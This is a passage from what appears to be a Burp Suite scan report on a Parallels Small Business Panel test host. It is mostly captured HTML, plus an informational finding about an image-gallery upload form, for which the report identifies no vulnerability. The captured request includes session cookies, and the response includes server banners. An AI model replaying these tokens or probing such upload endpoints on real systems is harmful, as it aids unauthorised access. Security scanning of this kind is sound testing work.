<table cellpadding="0" cellspacing="0" border="0" class="control-float-title-input"><tr><td class="sb-wizard-content-settings-fields"><table cellpadding="2" cellspacing="0" class="sb-wizard-content-settings-fields-block">
<tr>
<td class="title-block"><label class="name" for="companyName">Site title</label></td>
<td class="input-block"><input type="text" size="25" maxlength="255" class="sb-input" id="companyName" name="companyName" onchange="self.sbApplyChangesObject.registerChange(); self.sbApplyChangesObject.registerForcedSaving();" value="Site title"></td>
</tr>
<tr>
<td class="title-block"><label class="name" for="companySlogan">Subtitle</label></td>
<td class="input-block"><input type="text" size="25" maxlength="255" class="sb-input" id="companySlogan" name="companySlogan" onchange="self.sbApplyChangesObject.registerChange(); self.sbApplyChangesObject.registerForcedSaving();" value="Subtitle"></td>
</tr>
<tr>
<td class="title-block"><label class="name" for="copyright">Footer message</label></td>
<td class="input-block"><input type="text" size="25" maxlength="255" class="sb-input" id="copyright" name="copyright" onchange="self.sbApplyChangesObject.registerChange(); self.sbApplyChangesObject.registerForcedSaving();" value="Footer message"></td>
</tr>
</table></td></tr></table>
</td></tr></table></td>
</tr></table>
<script type="text/javascript">addEvent(window,'resize',resizeDivContent);
       sb_design.selectTemplate(
           'personal-018'
           , 'green'
           , 'green|red|blue'
           , 'icon_selected.gif'
           , 'logo.gif'
           , 'headers1'
           , 'headers1|headers2|headers3'
           , 'buttons1'
           , 'buttons1|buttons2|buttons3'
           , 'Personal'
           , ''
           ,
               customHeaders, true
           , customLogo
       );
   </script>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Start');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Design');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table></form>
</body>
</html>

6.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery/Category/Add  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/ImageGallery/Category/Add

Issue detail

The page contains a form which is used to submit a user-supplied file to the following URL:Note that Burp has not identified any specific security vulnerabilities with this functionality, and you should manually review it to determine whether any problems exist.

Request

GET /Wizard/Edit/Modules/ImageGallery/Category/Add HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:58:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Edit -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('HIDE-SITE-MAP', 'Hide Site Map');
           
               SbAppendLocaleKey('SHOW-SITE-MAP', 'Show Site Map');
           
               SbAppendLocaleKey('EMPTY-PAGE-TITLE', 'Please provide the page title.');
           
               SbAppendLocaleKey('EMPTY-PAGE-FILE-NAME', 'Please provide a page file name.');
           
               SbAppendLocaleKey('INVALID-PAGE-FILE-NAME', 'Page file name can contain only Latin characters, digits, dashes, and underscores.');
           
               SbAppendLocaleKey('DUPLICATE-PAGE-FILE-NAME', 'Page file name must be unique within each site structure. Also, you cannot name a page \'index\' because it is a reserved name.');
           
               SbAppendLocaleKey('SELECT-FOR-DELETE', 'Please select at least one element.');
           
               SbAppendLocaleKey('SURE-TO-DELETE', 'Selected items will be deleted permanently. Continue?');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-THUMB-WIDTH', 'Please provide a value for the Category image width parameter.');
           
               SbAppendLocaleKey('NOT-INT-CATEGORY-THUMB-WIDTH', 'Invalid value of the Category image width parameter. Please enter an integer number.');
           
               SbAppendLocaleKey('CATEGORY-MAX-THUMB-WIDTH', 'The maximum allowed value for the Category image width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-WIDTH', 'Please provide a value for the Image thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-WIDTH', 'Invalid value of the Image thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-THUMB-WIDTH', 'The maximum allowed value for the Image thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGE-THUMB-HEIGHT', 'Please provide a value for the Image thumb height parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGE-THUMB-HEIGHT', 'Invalid value of the Image thumb height parameter. It must be an integer number.');
           
               SbAppendLocaleKey('IMAGE-MAX-HEIGHT-WIDTH', 'The maximum allowed value for the Image thumb height parameter is 1536 (px).');
           
               SbAppendLocaleKey('EMPTY-PREVIEW-THUMB-WIDTH', 'Please provide a value for the Preview thumb width parameter.');
           
               SbAppendLocaleKey('NOT-INT-PREVIEW-THUMB-WIDTH', 'Invalid value of the Preview thumb width parameter. It must be an integer number.');
           
               SbAppendLocaleKey('PREVIEW-MAX-WIDTH-WIDTH', 'The maximum allowed value for the Preview thumb width parameter is 2048 (px).');
           
               SbAppendLocaleKey('EMPTY-IMAGES-PER-PAGE', 'Please provide a value for the Images per page parameter.');
           
               SbAppendLocaleKey('NOT-INT-IMAGES-PER-PAGE', 'Invalid value of the of the Images per page parameter. It must be an integer number.');
           
               SbAppendLocaleKey('EMPTY-CATEGORY-NAME', 'Please provide a value for Name.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="34%"><table align="center" onclick="return sbApplyChangesObject.no(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">No</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
<td align="center" width="33%" style="padding-left:15px;"><table align="center" onclick="sbApplyChangesObject.cancel(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Cancel</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr>
</table></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('SbApplyChanges');
       </script><script type="text/javascript" language="javascript" src="/js/apply_changes.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript"><!--
               sbApplyChangesObject = new SB_ApplyChanges('SbApplyChanges');
           //--></script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="StatusDetailedBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="StatusDetailed" style="width: 750px; height: 370px; display: none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="StatusDetailedHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="StatusDetailedTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Detailed status messages</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sb_status.hideDetails();return false;"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"><table class="sb-modalbox-help" style="padding-top: 5px; padding-bottom: 5px; width: 100%; padding-left: 10px;"><tr>
<td valign="top" style="padding-right: 10px;"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td width="100%" onclick="sb_status.showDetails();" id="StatusBar"><div id="StatusMessage">The page no longer exists.</div></td>
</tr></table></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><div>
<div style="margin-bottom: 7px;"><table cellspacing="1" border="0" style="width: 720px;" align="center"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="border-collapse: collapse;"><tr>
<td valign="middle" class="sb-text" style="padding-right: 5px;">View</td>
<td valign="middle" style="padding-right: 5px;"><select class="sb-text" onchange="sb_status.filterDetails(this.value)"><option value="0">All messages</option>
<option value="1">Information</option>
<option value="2">Errors</option>
<option value="3">Warnings</option></select></td>
</tr></table></td>
<td align="right"><table align="right" onclick="sb_status.clearDetails(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Clear</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
</tr></table></div>
<div style="height: 180px; border-style: solid; border-width: 0px; width: 100%; overflow-y: auto; overflow-x: auto; overflow: auto; float: left;"><table cellspacing="1" border="0" style="width: 100%;" align="center" id="StatusDetailedMessages">
<tr class="sb-gridview-header" align="left" style="height: 24px; white-space: nowrap;">
<th style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" scope="col">#</th>
<th style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" scope="col">S</th>
<th style="padding-left: 4px; padding-right: 4px;" scope="col">Message</th>
</tr>
<tr class="0" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
<tr class="1" style="display: none;">
<td style="padding-left: 4px; padding-right: 4px; text-align: left; font-wight: bold; width: 15px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px; text-align: center; width: 25px;" class="sb-gridtext">..</td>
<td style="padding-left: 4px; padding-right: 4px;" class="sb-gridtext">..</td>
</tr>
</table></div>
<div style="padding-top: 7px; width: 100%;"><table align="right" onclick="sb_status.hideDetails();return false; return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Close</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></div>
</div></td></tr></table></td></tr>
</table></td>
<td style="width: 10px; padding-top:10px; height:100%;"><div style="width:10px; height:100%; filter:alpha(opacity=25); background-color:black; opacity:0.25; display: table;"><span></span></div></td>
</tr></table></td></tr>
<tr><td style="padding-left:10px; height: 10px;"><div style="width:100%; height:10px; filter:alpha(opacity=25); background-color:black; opacity:0.25;"><span></span></div></td></tr>
</table></div>
<script type="text/javascript" language="javascript">
           SbInitModalForm('StatusDetailed');
       </script><script type="text/javascript" language="javascript" src="/js/wizard.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript" src="/js/navigation.js?5.0.0.2009110318"></script><script type="text/javascript" language="javascript">
           var baseUrl='';
           var sbNavigationObject;
           sbNavigationObject = new SB_Navigation('SB_WizardForm', '/Wizard/Edit/Modules/ImageGallery?tab=categories');
           </script><form name="SB_WizardForm" method="post" enctype="multipart/form-data" onsubmit="return wizardFormSubmit();" action="/Wizard/Edit/Modules/ImageGallery/Category/Insert">
<script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="modalFormBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="modalForm" style="width: 650px; height: 420px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="modalFormHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="modalFormTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Add New Category</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbNavigationObject.go();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"><table class="sb-modalbox-help" style="padding-top: 5px; padding-bottom: 5px; width: 100%; padding-left: 10px;"><tr>
<td valign="top" style="padding-right: 10px;"><img id="StatusIcon" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/icon_stop.gif"></td>
<td width="100%" onclick="sb_status.showDetails();" id="StatusBar"><div id="StatusMessage">The page no longer exists.</div></td>
</tr></table></td></tr>
<tr><td style="width:100%; height:100%;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="main"><input type="hidden" name="id" value=""><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="main" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="main_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="main_T">Main Properties</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="main_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="description" onclick="javascript:imageCategoryToogle('sb_panel_1', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="description_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="description_T">Description</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="description_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:block;" id="mainContent">
<script type="text/javascript" src="/modules/ImageGallery/js/validate.js?5.0.0.2009110318"></script><table cellpadding="0" cellspacing="0" border="0" class="control-title-input">
<tr>
<td class="title-block">
<label class="name" for="name">Name</label><span id="name_asterix" class="sb-asterix" style="">
               ..*
           </span>
</td>
<td class="input-block"><input type="text" size="25" maxlength="50" class="sb-input" id="name" name="name" onblur="showAsterix(this.id);"></td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">Current image</label></td>
<td class="input-block">
<table style="width: 102px; height: 70px; background-color: #A4A4A4;"><tr><td valign="middle" align="center"><span style="vertical-align: middle; color: #FFFFFF;"><b>No image</b></span></td></tr></table>
<input type="hidden" name="image" value="">
</td>
<td></td>
<td></td>
</tr>
<tr>
<td class="title-block"><label class="name">New image</label></td>
<td class="input-block"><input type="file" size="25" maxlength="255" class="sb-input" name="image"></td>
<td style="padding-left:5px;"><table cellpadding="0" cellspacing="0" border="0" style="
                       cursor: pointer;" class="" id="" onclick='setWizardFormAction("/Wizard/Edit/Modules/ImageGallery/Category/Image/Upload");wizardFormSubmit();'><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="MainText">Upload</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table></td>
<td style="padding-left:5px;"></td>
</tr>
</table>
</div>
<div style="display:none;" id="descriptionContent">
<label class="name"></label><script type="text/javascript" src="/wysiwyg/fckeditor.js?5.0.0.2009110318"></script><script language="JavaScript" type="text/javascript">
           function Init_Wysiwyg_description() {
               if (!Wysiwyg_description) {
                   Wysiwyg_description = new FCKeditor('Wysiwyg_description', '100%', '');
                   Wysiwyg_description.BasePath = '/wysiwyg//';
                   Wysiwyg_description.Config["CustomConfigurationsPath"] = Wysiwyg_description.BasePath + "/custom/config/modules/default.js?5.0.0.2009110318";
                   Wysiwyg_description.Config["SkinPath"] = Wysiwyg_description.BasePath + 'editor/skins/silver/';
                   Wysiwyg_description.ToolbarSet = "module";
                   
                   Wysiwyg_description.Config["LinkUpload"] = false;
                   Wysiwyg_description.Config["LinkBrowser"] = false;
                   Wysiwyg_description.Config["ImageBrowser"] = false;
                   
                   Wysiwyg_description.Config["ImageUploadURL"] = '/Wizard/Edit/Wysiwyg/ImageUpload';
                   
                   Wysiwyg_description.Config["SmileyPath"] = '/images/modules/smiley/';
                   
                   Wysiwyg_description.Config["AutoDetectLanguage"] = false;
                   Wysiwyg_description.Config["DefaultLanguage"]="en";
                   Wysiwyg_description.Config["Version"]="5.0.0.2009110318";
                   Wysiwyg_description.ReplaceTextarea();
               }
           }
           var Wysiwyg_description=null;
           
               RegisterOnloadAction('sb_panel_1.registerPageOnloadAction("description","Init_Wysiwyg_description();");');
           </script><textarea id="Wysiwyg_description" name="description" style="border-width: 0px; height: 100%;"></textarea><script type="text/javascript">
               SbAppendLocaleKey('uploadImageToServer', 'Please upload the image to the server.');
           
               SbAppendLocaleKey('invalidFileType', 'Invalid file type.');
           
               SbAppendLocaleKey('selectFile', 'Please select a file to upload.');
           </script>
</div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel_1 = new TabPanel();
           sb_panel_1.setupAllPages();
       </script><table cellpadding="0" cellspacing="0" border="0" style="width: 100%;"><tr><td style="padding: 0 10px;"><table cellpadding="0" cellspacing="0" class="form-tools-container"><tr><td><table cellpadding="0" cellspacing="0" class="ok-cancel-container"><tr>
<td><table cellspacing="0" cellpadding="0" border="0" style="cursor: pointer; width: 90px;" onclick="if (validateCategory()){wizardFormSubmit();}"><tr>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_left.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif); background-repeat:repeat-x; width: 1px; padding-left: 5px;"><img src="/skins/WinXPReloadedCompact/icons/ok.gif"></td>
<td style="background-image: url(/skins/WinXPReloadedCompact/images/button_ok_middle.gif);" align="center" class="sb-button-ok">OK</td>
<td style="width: 1px;"><img src="/skins/WinXPReloadedCompact/images/button_ok_right.gif"></td>
</tr></table></td>
